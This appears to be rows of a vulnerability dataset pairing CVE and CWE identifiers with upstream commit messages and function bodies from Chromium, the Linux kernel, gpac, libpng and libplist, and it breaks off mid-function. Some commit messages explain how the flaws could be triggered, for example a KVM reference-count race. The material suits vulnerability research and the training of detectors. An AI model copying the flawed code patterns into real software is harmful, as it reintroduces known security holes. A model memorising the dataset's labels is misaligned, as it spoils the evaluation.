|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/30b0f37300f8d671d29d91102ec7f475ed4cf7fe
|
30b0f37300f8d671d29d91102ec7f475ed4cf7fe
|
Use invalidation sets for :read-only and :read-write.
Gets rid of SubtreeStyleChange which relies on sibling tree recalcs.
R=tkent@chromium.org,ericwilligers@chromium.org
BUG=557440
Review URL: https://codereview.chromium.org/1454003002
Cr-Commit-Position: refs/heads/master@{#360298}
|
bool HTMLFormControlElement::isValidationMessageVisible() const
{
if (!m_hasValidationMessage)
return false;
ValidationMessageClient* client = validationMessageClient();
if (!client)
return false;
return client->isValidationMessageVisible(*this);
}
|
bool HTMLFormControlElement::isValidationMessageVisible() const
{
if (!m_hasValidationMessage)
return false;
ValidationMessageClient* client = validationMessageClient();
if (!client)
return false;
return client->isValidationMessageVisible(*this);
}
|
C
|
Chrome
| 0 |
CVE-2013-1957
|
https://www.cvedetails.com/cve/CVE-2013-1957/
|
CWE-264
|
https://github.com/torvalds/linux/commit/132c94e31b8bca8ea921f9f96a57d684fa4ae0a9
|
132c94e31b8bca8ea921f9f96a57d684fa4ae0a9
|
vfs: Carefully propogate mounts across user namespaces
As a matter of policy MNT_READONLY should not be changable if the
original mounter had more privileges than creator of the mount
namespace.
Add the flag CL_UNPRIVILEGED to note when we are copying a mount from
a mount namespace that requires more privileges to a mount namespace
that requires fewer privileges.
When the CL_UNPRIVILEGED flag is set cause clone_mnt to set MNT_NO_REMOUNT
if any of the mnt flags that should never be changed are set.
This protects both mount propagation and the initial creation of a less
privileged mount namespace.
Cc: stable@vger.kernel.org
Acked-by: Serge Hallyn <serge.hallyn@canonical.com>
Reported-by: Andy Lutomirski <luto@amacapital.net>
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
|
SYSCALL_DEFINE5(mount, char __user *, dev_name, char __user *, dir_name,
char __user *, type, unsigned long, flags, void __user *, data)
{
int ret;
char *kernel_type;
struct filename *kernel_dir;
char *kernel_dev;
unsigned long data_page;
ret = copy_mount_string(type, &kernel_type);
if (ret < 0)
goto out_type;
kernel_dir = getname(dir_name);
if (IS_ERR(kernel_dir)) {
ret = PTR_ERR(kernel_dir);
goto out_dir;
}
ret = copy_mount_string(dev_name, &kernel_dev);
if (ret < 0)
goto out_dev;
ret = copy_mount_options(data, &data_page);
if (ret < 0)
goto out_data;
ret = do_mount(kernel_dev, kernel_dir->name, kernel_type, flags,
(void *) data_page);
free_page(data_page);
out_data:
kfree(kernel_dev);
out_dev:
putname(kernel_dir);
out_dir:
kfree(kernel_type);
out_type:
return ret;
}
|
SYSCALL_DEFINE5(mount, char __user *, dev_name, char __user *, dir_name,
char __user *, type, unsigned long, flags, void __user *, data)
{
int ret;
char *kernel_type;
struct filename *kernel_dir;
char *kernel_dev;
unsigned long data_page;
ret = copy_mount_string(type, &kernel_type);
if (ret < 0)
goto out_type;
kernel_dir = getname(dir_name);
if (IS_ERR(kernel_dir)) {
ret = PTR_ERR(kernel_dir);
goto out_dir;
}
ret = copy_mount_string(dev_name, &kernel_dev);
if (ret < 0)
goto out_dev;
ret = copy_mount_options(data, &data_page);
if (ret < 0)
goto out_data;
ret = do_mount(kernel_dev, kernel_dir->name, kernel_type, flags,
(void *) data_page);
free_page(data_page);
out_data:
kfree(kernel_dev);
out_dev:
putname(kernel_dir);
out_dir:
kfree(kernel_type);
out_type:
return ret;
}
|
C
|
linux
| 0 |
CVE-2018-6143
|
https://www.cvedetails.com/cve/CVE-2018-6143/
|
CWE-125
|
https://github.com/chromium/chromium/commit/1f35b6980f600ec93e167118c21959d5cbd7c5c4
|
1f35b6980f600ec93e167118c21959d5cbd7c5c4
|
Fix Credential Management API Store() for existing Credentials
This changes fixes the Credential Management API to correctly handle
storing of already existing credentials. In the previous version
`preferred_match()` was updated, which is not necessarily the credential
selected by the user.
Bug: 795878
Cq-Include-Trybots: master.tryserver.chromium.linux:linux_mojo
Change-Id: I269f465861f44cdd784f0ce077e755191d3bd7bd
Reviewed-on: https://chromium-review.googlesource.com/843022
Commit-Queue: Jan Wilken Dörrie <jdoerrie@chromium.org>
Reviewed-by: Balazs Engedy <engedy@chromium.org>
Reviewed-by: Jochen Eisinger <jochen@chromium.org>
Reviewed-by: Maxim Kolosovskiy <kolos@chromium.org>
Cr-Commit-Position: refs/heads/master@{#526313}
|
void CredentialManagerImpl::Store(const CredentialInfo& credential,
StoreCallback callback) {
DCHECK_NE(CredentialType::CREDENTIAL_TYPE_EMPTY, credential.type);
if (password_manager_util::IsLoggingActive(client_)) {
CredentialManagerLogger(client_->GetLogManager())
.LogStoreCredential(GetLastCommittedURL(), credential.type);
}
std::move(callback).Run();
if (!client_->IsSavingAndFillingEnabledForCurrentPage() ||
!client_->OnCredentialManagerUsed())
return;
client_->NotifyStorePasswordCalled();
GURL origin = GetLastCommittedURL().GetOrigin();
std::unique_ptr<autofill::PasswordForm> form(
CreatePasswordFormFromCredentialInfo(credential, origin));
std::unique_ptr<autofill::PasswordForm> observed_form =
CreateObservedPasswordFormFromOrigin(origin);
auto form_fetcher = std::make_unique<FormFetcherImpl>(
PasswordStore::FormDigest(*observed_form), client_, false, false);
form_manager_ = std::make_unique<CredentialManagerPasswordFormManager>(
client_, *observed_form, std::move(form), this, nullptr,
std::move(form_fetcher));
form_manager_->Init(nullptr);
}
|
void CredentialManagerImpl::Store(const CredentialInfo& credential,
StoreCallback callback) {
DCHECK_NE(CredentialType::CREDENTIAL_TYPE_EMPTY, credential.type);
if (password_manager_util::IsLoggingActive(client_)) {
CredentialManagerLogger(client_->GetLogManager())
.LogStoreCredential(GetLastCommittedURL(), credential.type);
}
std::move(callback).Run();
if (!client_->IsSavingAndFillingEnabledForCurrentPage() ||
!client_->OnCredentialManagerUsed())
return;
client_->NotifyStorePasswordCalled();
GURL origin = GetLastCommittedURL().GetOrigin();
std::unique_ptr<autofill::PasswordForm> form(
CreatePasswordFormFromCredentialInfo(credential, origin));
std::unique_ptr<autofill::PasswordForm> observed_form =
CreateObservedPasswordFormFromOrigin(origin);
auto form_fetcher = std::make_unique<FormFetcherImpl>(
PasswordStore::FormDigest(*observed_form), client_, false, false);
form_manager_ = std::make_unique<CredentialManagerPasswordFormManager>(
client_, *observed_form, std::move(form), this, nullptr,
std::move(form_fetcher));
form_manager_->Init(nullptr);
}
|
C
|
Chrome
| 0 |
CVE-2018-20855
|
https://www.cvedetails.com/cve/CVE-2018-20855/
|
CWE-119
|
https://github.com/torvalds/linux/commit/0625b4ba1a5d4703c7fb01c497bd6c156908af00
|
0625b4ba1a5d4703c7fb01c497bd6c156908af00
|
IB/mlx5: Fix leaking stack memory to userspace
mlx5_ib_create_qp_resp was never initialized and only the first 4 bytes
were written.
Fixes: 41d902cb7c32 ("RDMA/mlx5: Fix definition of mlx5_ib_create_qp_resp")
Cc: <stable@vger.kernel.org>
Acked-by: Leon Romanovsky <leonro@mellanox.com>
Signed-off-by: Jason Gunthorpe <jgg@mellanox.com>
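This class of bug has a simple general remedy: zero the whole response structure before filling individual fields, so uninitialized stack bytes (including padding) can never reach userspace. A minimal sketch with hypothetical struct and field names, not the mlx5 patch itself:
#include <string.h>

struct create_qp_resp {
    unsigned int handle;       /* the only field the driver used to write */
    unsigned int reserved[7];  /* previously left as uninitialized stack */
};

static void fill_create_qp_resp(struct create_qp_resp *resp, unsigned int handle)
{
    memset(resp, 0, sizeof(*resp));  /* zero everything first */
    resp->handle = handle;           /* then set the fields that matter */
}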
|
static void destroy_raw_packet_qp_rq(struct mlx5_ib_dev *dev,
struct mlx5_ib_rq *rq)
{
mlx5_core_destroy_rq_tracked(dev->mdev, &rq->base.mqp);
}
|
static void destroy_raw_packet_qp_rq(struct mlx5_ib_dev *dev,
struct mlx5_ib_rq *rq)
{
mlx5_core_destroy_rq_tracked(dev->mdev, &rq->base.mqp);
}
|
C
|
linux
| 0 |
CVE-2019-12818
|
https://www.cvedetails.com/cve/CVE-2019-12818/
|
CWE-476
|
https://github.com/torvalds/linux/commit/58bdd544e2933a21a51eecf17c3f5f94038261b5
|
58bdd544e2933a21a51eecf17c3f5f94038261b5
|
net: nfc: Fix NULL dereference on nfc_llcp_build_tlv fails
KASAN report this:
BUG: KASAN: null-ptr-deref in nfc_llcp_build_gb+0x37f/0x540 [nfc]
Read of size 3 at addr 0000000000000000 by task syz-executor.0/5401
CPU: 0 PID: 5401 Comm: syz-executor.0 Not tainted 5.0.0-rc7+ #45
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
Call Trace:
__dump_stack lib/dump_stack.c:77 [inline]
dump_stack+0xfa/0x1ce lib/dump_stack.c:113
kasan_report+0x171/0x18d mm/kasan/report.c:321
memcpy+0x1f/0x50 mm/kasan/common.c:130
nfc_llcp_build_gb+0x37f/0x540 [nfc]
nfc_llcp_register_device+0x6eb/0xb50 [nfc]
nfc_register_device+0x50/0x1d0 [nfc]
nfcsim_device_new+0x394/0x67d [nfcsim]
? 0xffffffffc1080000
nfcsim_init+0x6b/0x1000 [nfcsim]
do_one_initcall+0xfa/0x5ca init/main.c:887
do_init_module+0x204/0x5f6 kernel/module.c:3460
load_module+0x66b2/0x8570 kernel/module.c:3808
__do_sys_finit_module+0x238/0x2a0 kernel/module.c:3902
do_syscall_64+0x147/0x600 arch/x86/entry/common.c:290
entry_SYSCALL_64_after_hwframe+0x49/0xbe
RIP: 0033:0x462e99
Code: f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f9cb79dcc58 EFLAGS: 00000246 ORIG_RAX: 0000000000000139
RAX: ffffffffffffffda RBX: 000000000073bf00 RCX: 0000000000462e99
RDX: 0000000000000000 RSI: 0000000020000280 RDI: 0000000000000003
RBP: 00007f9cb79dcc70 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 00007f9cb79dd6bc
R13: 00000000004bcefb R14: 00000000006f7030 R15: 0000000000000004
nfc_llcp_build_tlv will return NULL on fails, caller should check it,
otherwise will trigger a NULL dereference.
Reported-by: Hulk Robot <hulkci@huawei.com>
Fixes: eda21f16a5ed ("NFC: Set MIU and RW values from CONNECT and CC LLCP frames")
Fixes: d646960f7986 ("NFC: Initial LLCP support")
Signed-off-by: YueHaibing <yuehaibing@huawei.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
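Shape of the fix, as a self-contained sketch: the TLV builder can return NULL on allocation failure, and the caller must bail out instead of copying from it. The helper names and toy TLV layout are assumptions for illustration only, not the kernel's nfc_llcp code.
#include <stdlib.h>
#include <string.h>

/* Toy TLV builder: returns a malloc'd [type, len, value...] buffer,
 * or NULL on allocation failure (the case the caller must handle). */
static unsigned char *build_tlv(unsigned char type, const unsigned char *value,
                                unsigned char value_len, size_t *tlv_len)
{
    unsigned char *tlv = malloc(2 + (size_t)value_len);
    if (tlv == NULL)
        return NULL;
    tlv[0] = type;
    tlv[1] = value_len;
    memcpy(tlv + 2, value, value_len);
    *tlv_len = 2 + (size_t)value_len;
    return tlv;
}

static int append_tlv(unsigned char *gb, size_t *offset, size_t gb_len,
                      unsigned char type, const unsigned char *value,
                      unsigned char value_len)
{
    size_t tlv_len = 0;
    unsigned char *tlv = build_tlv(type, value, value_len, &tlv_len);

    /* The reported bug was dereferencing the builder's result without
     * checking for NULL; bail out instead. */
    if (tlv == NULL)
        return -1;

    if (*offset + tlv_len <= gb_len) {
        memcpy(gb + *offset, tlv, tlv_len);
        *offset += tlv_len;
    }
    free(tlv);
    return 0;
}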
|
static void nfc_llcp_socket_release(struct nfc_llcp_local *local, bool device,
int err)
{
struct sock *sk;
struct hlist_node *tmp;
struct nfc_llcp_sock *llcp_sock;
skb_queue_purge(&local->tx_queue);
write_lock(&local->sockets.lock);
sk_for_each_safe(sk, tmp, &local->sockets.head) {
llcp_sock = nfc_llcp_sock(sk);
bh_lock_sock(sk);
nfc_llcp_socket_purge(llcp_sock);
if (sk->sk_state == LLCP_CONNECTED)
nfc_put_device(llcp_sock->dev);
if (sk->sk_state == LLCP_LISTEN) {
struct nfc_llcp_sock *lsk, *n;
struct sock *accept_sk;
list_for_each_entry_safe(lsk, n,
&llcp_sock->accept_queue,
accept_queue) {
accept_sk = &lsk->sk;
bh_lock_sock(accept_sk);
nfc_llcp_accept_unlink(accept_sk);
if (err)
accept_sk->sk_err = err;
accept_sk->sk_state = LLCP_CLOSED;
accept_sk->sk_state_change(sk);
bh_unlock_sock(accept_sk);
}
}
if (err)
sk->sk_err = err;
sk->sk_state = LLCP_CLOSED;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sk_del_node_init(sk);
}
write_unlock(&local->sockets.lock);
/* If we still have a device, we keep the RAW sockets alive */
if (device == true)
return;
write_lock(&local->raw_sockets.lock);
sk_for_each_safe(sk, tmp, &local->raw_sockets.head) {
llcp_sock = nfc_llcp_sock(sk);
bh_lock_sock(sk);
nfc_llcp_socket_purge(llcp_sock);
if (err)
sk->sk_err = err;
sk->sk_state = LLCP_CLOSED;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sk_del_node_init(sk);
}
write_unlock(&local->raw_sockets.lock);
}
|
static void nfc_llcp_socket_release(struct nfc_llcp_local *local, bool device,
int err)
{
struct sock *sk;
struct hlist_node *tmp;
struct nfc_llcp_sock *llcp_sock;
skb_queue_purge(&local->tx_queue);
write_lock(&local->sockets.lock);
sk_for_each_safe(sk, tmp, &local->sockets.head) {
llcp_sock = nfc_llcp_sock(sk);
bh_lock_sock(sk);
nfc_llcp_socket_purge(llcp_sock);
if (sk->sk_state == LLCP_CONNECTED)
nfc_put_device(llcp_sock->dev);
if (sk->sk_state == LLCP_LISTEN) {
struct nfc_llcp_sock *lsk, *n;
struct sock *accept_sk;
list_for_each_entry_safe(lsk, n,
&llcp_sock->accept_queue,
accept_queue) {
accept_sk = &lsk->sk;
bh_lock_sock(accept_sk);
nfc_llcp_accept_unlink(accept_sk);
if (err)
accept_sk->sk_err = err;
accept_sk->sk_state = LLCP_CLOSED;
accept_sk->sk_state_change(sk);
bh_unlock_sock(accept_sk);
}
}
if (err)
sk->sk_err = err;
sk->sk_state = LLCP_CLOSED;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sk_del_node_init(sk);
}
write_unlock(&local->sockets.lock);
/* If we still have a device, we keep the RAW sockets alive */
if (device == true)
return;
write_lock(&local->raw_sockets.lock);
sk_for_each_safe(sk, tmp, &local->raw_sockets.head) {
llcp_sock = nfc_llcp_sock(sk);
bh_lock_sock(sk);
nfc_llcp_socket_purge(llcp_sock);
if (err)
sk->sk_err = err;
sk->sk_state = LLCP_CLOSED;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sk_del_node_init(sk);
}
write_unlock(&local->raw_sockets.lock);
}
|
C
|
linux
| 0 |
CVE-2017-5011
|
https://www.cvedetails.com/cve/CVE-2017-5011/
|
CWE-200
|
https://github.com/chromium/chromium/commit/eea3300239f0b53e172a320eb8de59d0bea65f27
|
eea3300239f0b53e172a320eb8de59d0bea65f27
|
DevTools: move front-end URL handling to DevToolsUIBindingds
BUG=662859
Review-Url: https://codereview.chromium.org/2607833002
Cr-Commit-Position: refs/heads/master@{#440926}
|
ResponseWriter::ResponseWriter(base::WeakPtr<DevToolsUIBindings> bindings,
int stream_id)
: bindings_(bindings),
stream_id_(stream_id) {
}
|
ResponseWriter::ResponseWriter(base::WeakPtr<DevToolsUIBindings> bindings,
int stream_id)
: bindings_(bindings),
stream_id_(stream_id) {
}
|
C
|
Chrome
| 0 |
CVE-2015-1295
|
https://www.cvedetails.com/cve/CVE-2015-1295/
| null |
https://github.com/chromium/chromium/commit/8fa5a358cb32085b51daf92df8fd4a79b3931f81
|
8fa5a358cb32085b51daf92df8fd4a79b3931f81
|
Crash on nested IPC handlers in PrintWebViewHelper
The class is not designed to handle nested IPC, and regular flows do not
expect it. Still, during printing, plugins may show message
boxes and start nested message loops.
For now we just crash. If stats show us that this case is
frequent, we will have to do something more complicated.
BUG=502562
Review URL: https://codereview.chromium.org/1228693002
Cr-Commit-Position: refs/heads/master@{#338100}
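A minimal sketch of the "just crash on nesting" approach described above, using a plain reentrancy guard; the handler name and guard variable are hypothetical, not the Chromium code.
#include <assert.h>

static int g_handling_print_ipc;  /* hypothetical reentrancy guard */

static void handle_print_ipc(void)
{
    assert(!g_handling_print_ipc);  /* nested IPC is unsupported: crash loudly */
    g_handling_print_ipc = 1;
    /* ... printing work; a plugin could try to spin a nested message loop ... */
    g_handling_print_ipc = 0;
}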
|
blink::WebLocalFrame* FrameReference::GetFrame() {
if (view_ == NULL || frame_ == NULL)
return NULL;
for (blink::WebFrame* frame = view_->mainFrame(); frame != NULL;
frame = frame->traverseNext(false)) {
if (frame == frame_)
return frame_;
}
return NULL;
}
|
blink::WebLocalFrame* FrameReference::GetFrame() {
if (view_ == NULL || frame_ == NULL)
return NULL;
for (blink::WebFrame* frame = view_->mainFrame(); frame != NULL;
frame = frame->traverseNext(false)) {
if (frame == frame_)
return frame_;
}
return NULL;
}
|
C
|
Chrome
| 0 |
CVE-2018-13006
|
https://www.cvedetails.com/cve/CVE-2018-13006/
|
CWE-125
|
https://github.com/gpac/gpac/commit/bceb03fd2be95097a7b409ea59914f332fb6bc86
|
bceb03fd2be95097a7b409ea59914f332fb6bc86
|
fixed 2 possible heap overflows (inc. #1088)
|
GF_Err tssy_Read(GF_Box *s, GF_BitStream *bs)
{
GF_TimeStampSynchronyBox *ptr = (GF_TimeStampSynchronyBox *)s;
gf_bs_read_int(bs, 6);
ptr->timestamp_sync = gf_bs_read_int(bs, 2);
return GF_OK;
}
|
GF_Err tssy_Read(GF_Box *s, GF_BitStream *bs)
{
GF_TimeStampSynchronyBox *ptr = (GF_TimeStampSynchronyBox *)s;
gf_bs_read_int(bs, 6);
ptr->timestamp_sync = gf_bs_read_int(bs, 2);
return GF_OK;
}
|
C
|
gpac
| 0 |
CVE-2015-1573
|
https://www.cvedetails.com/cve/CVE-2015-1573/
|
CWE-19
|
https://github.com/torvalds/linux/commit/a2f18db0c68fec96631c10cad9384c196e9008ac
|
a2f18db0c68fec96631c10cad9384c196e9008ac
|
netfilter: nf_tables: fix flush ruleset chain dependencies
Jumping between chains doesn't mix well with flush ruleset. Rules
from a different chain and set elements may still refer to us.
[ 353.373791] ------------[ cut here ]------------
[ 353.373845] kernel BUG at net/netfilter/nf_tables_api.c:1159!
[ 353.373896] invalid opcode: 0000 [#1] SMP
[ 353.373942] Modules linked in: intel_powerclamp uas iwldvm iwlwifi
[ 353.374017] CPU: 0 PID: 6445 Comm: 31c3.nft Not tainted 3.18.0 #98
[ 353.374069] Hardware name: LENOVO 5129CTO/5129CTO, BIOS 6QET47WW (1.17 ) 07/14/2010
[...]
[ 353.375018] Call Trace:
[ 353.375046] [<ffffffff81964c31>] ? nf_tables_commit+0x381/0x540
[ 353.375101] [<ffffffff81949118>] nfnetlink_rcv+0x3d8/0x4b0
[ 353.375150] [<ffffffff81943fc5>] netlink_unicast+0x105/0x1a0
[ 353.375200] [<ffffffff8194438e>] netlink_sendmsg+0x32e/0x790
[ 353.375253] [<ffffffff818f398e>] sock_sendmsg+0x8e/0xc0
[ 353.375300] [<ffffffff818f36b9>] ? move_addr_to_kernel.part.20+0x19/0x70
[ 353.375357] [<ffffffff818f44f9>] ? move_addr_to_kernel+0x19/0x30
[ 353.375410] [<ffffffff819016d2>] ? verify_iovec+0x42/0xd0
[ 353.375459] [<ffffffff818f3e10>] ___sys_sendmsg+0x3f0/0x400
[ 353.375510] [<ffffffff810615fa>] ? native_sched_clock+0x2a/0x90
[ 353.375563] [<ffffffff81176697>] ? acct_account_cputime+0x17/0x20
[ 353.375616] [<ffffffff8110dc78>] ? account_user_time+0x88/0xa0
[ 353.375667] [<ffffffff818f4bbd>] __sys_sendmsg+0x3d/0x80
[ 353.375719] [<ffffffff81b184f4>] ? int_check_syscall_exit_work+0x34/0x3d
[ 353.375776] [<ffffffff818f4c0d>] SyS_sendmsg+0xd/0x20
[ 353.375823] [<ffffffff81b1826d>] system_call_fastpath+0x16/0x1b
Release objects in this order: rules -> sets -> chains -> tables, to
make sure no references to chains are held anymore.
Reported-by: Asbjoern Sloth Toennesen <asbjorn@asbjorn.biz>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
|
static int __init nf_tables_module_init(void)
{
int err;
info = kmalloc(sizeof(struct nft_expr_info) * NFT_RULE_MAXEXPRS,
GFP_KERNEL);
if (info == NULL) {
err = -ENOMEM;
goto err1;
}
err = nf_tables_core_module_init();
if (err < 0)
goto err2;
err = nfnetlink_subsys_register(&nf_tables_subsys);
if (err < 0)
goto err3;
pr_info("nf_tables: (c) 2007-2009 Patrick McHardy <kaber@trash.net>\n");
return register_pernet_subsys(&nf_tables_net_ops);
err3:
nf_tables_core_module_exit();
err2:
kfree(info);
err1:
return err;
}
|
static int __init nf_tables_module_init(void)
{
int err;
info = kmalloc(sizeof(struct nft_expr_info) * NFT_RULE_MAXEXPRS,
GFP_KERNEL);
if (info == NULL) {
err = -ENOMEM;
goto err1;
}
err = nf_tables_core_module_init();
if (err < 0)
goto err2;
err = nfnetlink_subsys_register(&nf_tables_subsys);
if (err < 0)
goto err3;
pr_info("nf_tables: (c) 2007-2009 Patrick McHardy <kaber@trash.net>\n");
return register_pernet_subsys(&nf_tables_net_ops);
err3:
nf_tables_core_module_exit();
err2:
kfree(info);
err1:
return err;
}
|
C
|
linux
| 0 |
CVE-2019-6974
|
https://www.cvedetails.com/cve/CVE-2019-6974/
|
CWE-362
|
https://github.com/torvalds/linux/commit/cfa39381173d5f969daf43582c95ad679189cbc9
|
cfa39381173d5f969daf43582c95ad679189cbc9
|
kvm: fix kvm_ioctl_create_device() reference counting (CVE-2019-6974)
kvm_ioctl_create_device() does the following:
1. creates a device that holds a reference to the VM object (with a borrowed
reference, the VM's refcount has not been bumped yet)
2. initializes the device
3. transfers the reference to the device to the caller's file descriptor table
4. calls kvm_get_kvm() to turn the borrowed reference to the VM into a real
reference
The ownership transfer in step 3 must not happen before the reference to the VM
becomes a proper, non-borrowed reference, which only happens in step 4.
After step 3, an attacker can close the file descriptor and drop the borrowed
reference, which can cause the refcount of the kvm object to drop to zero.
This means that we need to grab a reference for the device before
anon_inode_getfd(), otherwise the VM can disappear from under us.
Fixes: 852b6d57dc7f ("kvm: add device control API")
Cc: stable@kernel.org
Signed-off-by: Jann Horn <jannh@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
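The ordering constraint can be shown with a toy refcounted object in plain C (kernel types and anon_inode_getfd() replaced with stand-ins): take the extra reference before publishing the object to another owner, and drop it again if publishing fails.
#include <stdio.h>

struct obj {
    int refcount;
};

static void obj_get(struct obj *o) { o->refcount++; }
static void obj_put(struct obj *o) { o->refcount--; }

/* Stand-in for anon_inode_getfd(): may fail with a negative value. */
static int publish_fd(struct obj *o) { (void)o; return 3; }

static int create_device(struct obj *vm)
{
    int fd;

    /* Take the reference *before* handing the object to the fd table,
     * so a concurrent close() cannot drop the last reference under us. */
    obj_get(vm);

    fd = publish_fd(vm);
    if (fd < 0) {
        obj_put(vm);   /* undo the reference on failure */
        return fd;
    }
    return fd;
}

int main(void)
{
    struct obj vm = { .refcount = 1 };
    int fd = create_device(&vm);
    printf("fd=%d refcount=%d\n", fd, vm.refcount);
    return 0;
}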
|
static int vcpu_stat_get_per_vm_open(struct inode *inode, struct file *file)
{
__simple_attr_check_format("%llu\n", 0ull);
return kvm_debugfs_open(inode, file, vcpu_stat_get_per_vm,
vcpu_stat_clear_per_vm, "%llu\n");
}
|
static int vcpu_stat_get_per_vm_open(struct inode *inode, struct file *file)
{
__simple_attr_check_format("%llu\n", 0ull);
return kvm_debugfs_open(inode, file, vcpu_stat_get_per_vm,
vcpu_stat_clear_per_vm, "%llu\n");
}
|
C
|
linux
| 0 |
CVE-2018-20071
|
https://www.cvedetails.com/cve/CVE-2018-20071/
| null |
https://github.com/chromium/chromium/commit/562da5192ff110199fe290bdb7ea76d8118071fd
|
562da5192ff110199fe290bdb7ea76d8118071fd
|
[Payments] Restrict just-in-time payment handler to payment method domain and its subdomains
Bug: 853937
Change-Id: I148b3d96950a9d90fa362e580e9593caa6b92a36
Reviewed-on: https://chromium-review.googlesource.com/1132116
Reviewed-by: Mathieu Perreault <mathp@chromium.org>
Commit-Queue: Ganggui Tang <gogerald@chromium.org>
Cr-Commit-Position: refs/heads/master@{#573911}
|
void InstallablePaymentAppCrawler::WarnIfPossible(const std::string& message) {
if (web_contents()) {
web_contents()->GetMainFrame()->AddMessageToConsole(
content::ConsoleMessageLevel::CONSOLE_MESSAGE_LEVEL_WARNING, message);
} else {
LOG(WARNING) << message;
}
}
|
void InstallablePaymentAppCrawler::WarnIfPossible(const std::string& message) {
if (web_contents()) {
web_contents()->GetMainFrame()->AddMessageToConsole(
content::ConsoleMessageLevel::CONSOLE_MESSAGE_LEVEL_WARNING, message);
} else {
LOG(WARNING) << message;
}
}
|
C
|
Chrome
| 0 |
CVE-2016-3751
|
https://www.cvedetails.com/cve/CVE-2016-3751/
| null |
https://android.googlesource.com/platform/external/libpng/+/9d4853418ab2f754c2b63e091c29c5529b8b86ca
|
9d4853418ab2f754c2b63e091c29c5529b8b86ca
|
DO NOT MERGE Update libpng to 1.6.20
BUG:23265085
Change-Id: I85199805636d771f3597b691b63bc0bf46084833
(cherry picked from commit bbe98b40cda082024b669fa508931042eed18f82)
|
checkbuffer(Image *image, const char *arg)
{
if (check16(image->buffer, 95))
{
fflush(stdout);
fprintf(stderr, "%s: overwrite at start of image buffer\n", arg);
exit(1);
}
if (check16(image->buffer+16+image->allocsize, 95))
{
fflush(stdout);
fprintf(stderr, "%s: overwrite at end of image buffer\n", arg);
exit(1);
}
}
|
checkbuffer(Image *image, const char *arg)
{
if (check16(image->buffer, 95))
{
fflush(stdout);
fprintf(stderr, "%s: overwrite at start of image buffer\n", arg);
exit(1);
}
if (check16(image->buffer+16+image->allocsize, 95))
{
fflush(stdout);
fprintf(stderr, "%s: overwrite at end of image buffer\n", arg);
exit(1);
}
}
|
C
|
Android
| 0 |
CVE-2011-1800
|
https://www.cvedetails.com/cve/CVE-2011-1800/
|
CWE-189
|
https://github.com/chromium/chromium/commit/1777aa6484af15014b8691082a8c3075418786f5
|
1777aa6484af15014b8691082a8c3075418786f5
|
[Qt][WK2] Allow transparent WebViews
https://bugs.webkit.org/show_bug.cgi?id=80608
Reviewed by Tor Arne Vestbø.
Added support for transparentBackground in QQuickWebViewExperimental.
This uses the existing drawsTransparentBackground property in WebKit2.
Also, changed LayerTreeHostQt to set the contentsOpaque flag when the root layer changes,
otherwise the change doesn't take effect.
A new API test was added.
* UIProcess/API/qt/qquickwebview.cpp:
(QQuickWebViewPrivate::setTransparentBackground):
(QQuickWebViewPrivate::transparentBackground):
(QQuickWebViewExperimental::transparentBackground):
(QQuickWebViewExperimental::setTransparentBackground):
* UIProcess/API/qt/qquickwebview_p.h:
* UIProcess/API/qt/qquickwebview_p_p.h:
(QQuickWebViewPrivate):
* UIProcess/API/qt/tests/qquickwebview/tst_qquickwebview.cpp:
(tst_QQuickWebView):
(tst_QQuickWebView::transparentWebViews):
* WebProcess/WebPage/qt/LayerTreeHostQt.cpp:
(WebKit::LayerTreeHostQt::LayerTreeHostQt):
(WebKit::LayerTreeHostQt::setRootCompositingLayer):
git-svn-id: svn://svn.chromium.org/blink/trunk@110254 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
QDeclarativeComponent* QQuickWebViewExperimental::authenticationDialog() const
{
Q_D(const QQuickWebView);
return d->authenticationDialog;
}
|
QDeclarativeComponent* QQuickWebViewExperimental::authenticationDialog() const
{
Q_D(const QQuickWebView);
return d->authenticationDialog;
}
|
C
|
Chrome
| 0 |
CVE-2017-6435
|
https://www.cvedetails.com/cve/CVE-2017-6435/
|
CWE-119
|
https://github.com/libimobiledevice/libplist/commit/fbd8494d5e4e46bf2e90cb6116903e404374fb56
|
fbd8494d5e4e46bf2e90cb6116903e404374fb56
|
bplist: Make sure to bail out if malloc() fails in parse_string_node()
Credit to Wang Junjie <zhunkibatu@gmail.com> (#93)
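A minimal sketch of the pattern the commit adds, assuming a simple length-prefixed string copy; the function name is illustrative, not the libplist code.
#include <stdlib.h>
#include <string.h>

/* Copy a length-prefixed string out of a buffer, bailing out if the
 * allocation fails instead of writing through a NULL pointer. */
static char *copy_string_node(const char *data, size_t len)
{
    char *str = malloc(len + 1);
    if (str == NULL)        /* the missing check the commit adds */
        return NULL;
    memcpy(str, data, len);
    str[len] = '\0';
    return str;
}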
|
static uint16_t *plist_utf8_to_utf16(char *unistr, long size, long *items_read, long *items_written)
{
uint16_t *outbuf = (uint16_t*)malloc(((size*2)+1)*sizeof(uint16_t));
int p = 0;
long i = 0;
unsigned char c0;
unsigned char c1;
unsigned char c2;
unsigned char c3;
uint32_t w;
while (i < size) {
c0 = unistr[i];
c1 = (i < size-1) ? unistr[i+1] : 0;
c2 = (i < size-2) ? unistr[i+2] : 0;
c3 = (i < size-3) ? unistr[i+3] : 0;
if ((c0 >= 0xF0) && (i < size-3) && (c1 >= 0x80) && (c2 >= 0x80) && (c3 >= 0x80)) {
w = ((((c0 & 7) << 18) + ((c1 & 0x3F) << 12) + ((c2 & 0x3F) << 6) + (c3 & 0x3F)) & 0x1FFFFF) - 0x010000;
outbuf[p++] = 0xD800 + (w >> 10);
outbuf[p++] = 0xDC00 + (w & 0x3FF);
i+=4;
